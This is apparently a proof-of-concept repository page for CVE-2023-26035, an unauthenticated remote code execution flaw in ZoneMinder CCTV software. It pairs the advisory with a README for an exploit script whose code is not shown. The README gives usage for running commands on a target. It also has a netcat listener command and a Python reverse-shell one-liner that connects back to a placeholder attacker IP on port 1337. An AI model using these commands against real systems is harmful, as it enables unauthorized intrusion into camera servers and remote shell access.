
CVE-2023-26035 PoC — ZoneMinder vulnerable to Missing Authorization

Associated Vulnerability
Title: ZoneMinder vulnerable to Missing Authorization (CVE-2023-26035)
Description: ZoneMinder is a free, open source closed-circuit television (CCTV) software application for Linux which supports IP, USB and analog cameras. Versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution via Missing Authorization. There is no permissions check on the snapshot action, which expects an id to fetch an existing monitor but can be passed an object to create a new one instead. TriggerOn ends up calling shell_exec using the supplied Id. This issue is fixed in versions 1.36.33 and 1.37.33.
Description
Exploit for CVE-2023-26035 affecting ZoneMinder < 1.36.33 and < 1.37.33
Readme
# Exploit - ZoneMinder CVE-2023-26035

There is an **Unauthenticated Remote Code Execution (RCE)** vulnerability affecting **ZoneMinder** Snapshots.  
This is an **exploit** for CVE-2023-26035.

## Affected versions

ZoneMinder **< 1.36.33** and  
ZoneMinder **< 1.37.33**.

![Usage of the exploit](./demo.png)

## Usage

#### Check if the target is vulnerable:

    python3 zoneminder.py http://target

#### Execute a command

    python3 zoneminder.py http://target command


## Examples

#### Test command execution with `ping`

Run `tcpdump` on the interface connected to the target (here `tun0`) and filter for `ICMP` packets:

    sudo tcpdump -i tun0 icmp

Then ping your own IP from the target. Make sure to wrap the command in double quotes `"`, otherwise it won't be interpreted correctly.

    python3 zoneminder.py http://target "ping -c 4 your_ip"

#### Reverse shell

Create the listener with netcat:

    nc -lvnp 1337

Use a reverse shell oneliner:

    python3 zoneminder.py http://TARGET "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",1337));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'"

More at https://revshells.com.

## Requirements

The exploit makes use of **`requests`** and **`BeautifulSoup`**.
Install them with:

    python3 -m pip install requests beautifulsoup4

## Acknowledgements

I just wanted a standalone exploit that didn't require Metasploit.  
The script is derived from https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/zoneminder_snapshots.rb

https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr
File Snapshot

[4.0K] /data/pocs/c4789e4428047af177d42aebddd1196f627873b3
├── [ 77K] demo.png
├── [1.6K] README.md
└── [3.3K] zoneminder.py

0 directories, 3 files